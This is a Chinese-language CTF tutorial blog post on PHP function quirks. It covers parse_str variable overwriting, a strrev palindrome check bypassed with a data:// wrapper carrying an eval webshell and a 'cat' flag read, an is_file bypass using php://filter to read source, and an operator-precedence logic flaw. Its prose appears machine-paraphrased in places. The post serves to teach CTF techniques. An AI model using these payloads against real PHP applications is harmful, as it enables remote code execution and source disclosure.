本文正在参与「金石方案 . 瓜分6万现金大奖」

前语

上篇文章讲的进阶一些的PHP特性不知道我们吸收的怎么样了,今天作为本PHP特性函数的最终一篇,我也会要点介绍一些有趣的PHP特性以及运用方法,下面开端咱们今天的内容分享。

parse_str

CTF中的PHP特性函数(下)

parse_str()这个函数会把查询字符串解析到变量中。那么咱们怎么运用它的特性呢,咱们看下面的例子:

<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;
       }
} ?>

剖析一下代码要求咱们什么,看最终要咱们数组v2等于md5(v3),而依据上面代码v2则是由该函数经过v1后赋值给的,那咱们解题的思路就有了,运用parse_str() 函数的特点将v2[flag]的值掩盖,那么具体要怎样做呢?

先对数字5进行md5加密:

<?php
$b=md5('5');
echo $b;// e4da3b7fbbce2345d7772b0674a318d5
?>

之后再从v1传入咱们的值即可完结绕过:

Payload:
GET:v3=5
POST: v1=flag=e4da3b7fbbce2345d7772b0674a318d5

strrev

CTF中的PHP特性函数(下)

这个函数还是很好了解的,便是将字符串进行翻转,曾经遇到过考察这个的题目觉得很有趣分享给我们,咱们先看代码:

CTF中的PHP特性函数(下)

highlight_file(__FILE__);
    $file = $_POST['file'];
    if(isset($file)){
        if(strrev($file)==$file){
            include $file;
        }

代码很简单,第一个是高亮代码没有什么用,要咱们传入file并且要使回文数等于它本身并且还要考虑怎么进行进犯,是不是不太好想,这儿运用php里面的data协议,该协议能够进行写入数据,并且?>闭合后能够加任意字符不会受别的影响。所以咱们结构代码:

data://text/plain,<?php eval($_POST[1]);?>>?;)]1[TSOP_$(lave php?<,nialp/txet//:atad&1=echo `cat /f1agaaa`;

能够看到思路还是挺巧妙的。

is_file

CTF中的PHP特性函数(下)

该函数检测是不是一个惯例的文件类型,在CTF中也出过绕过这个函数的题目,下面咱们先看看代码:

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/../|http|https|data|input|rot13|base64|string/i',$file)){
        die("hacker!");
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
} ?>

剖析一下filter函数过滤了许多关键字符串对咱们的输入进行限制,最终还不能让is_file检测出来是文件,那咱们要怎样读取flag.php文件呢,看最终有个高亮file的操作,这儿便是运用点,咱们要让其等于flag文件,所以需求绕过:

这儿依据特性is_file不会识别php伪协议,所以咱们结构下面代码:

php://filter/read=convert.quoted-printable-encode/resource=flag.php

这样传入即可绕过检测。

优先级问题

在php里存在以下优先级特性:

&&与||的优先级高于=,而&&优先级高于||

=的优先级高于and与or

这儿也能够作为考点来考,咱们看下面代码:

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){
    $username = (String)$_GET['username'];
    $password = (String)$_GET['password'];
    $code = (String)$_GET['code'];
    if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){
        if($code == 'admin'){
            echo $flag;
        } 
    }
}

咱们需求传入三个参数,之后进行类型的强制转换,再经过判别句子,最终需求code参数等于admin方可解题,依据优先级原则,所以当第一个判别条件为true时,直接跳过第二个条件然后判别第三个条件,可能有一些绕,只要username=admin为真值,code=admin输出flag,所以结构payload:

?code=admin&password=1&username=admin

结语

本文到这就结束了,这篇文章讲了几个比较有趣并且有一些难度的特性知识,不知道我们吸收的咋样了,当然PHP特性远没有这么少,有兴趣的小伙伴能够自行去了解一下。喜欢本文的朋友希望能够一键三连支撑一下。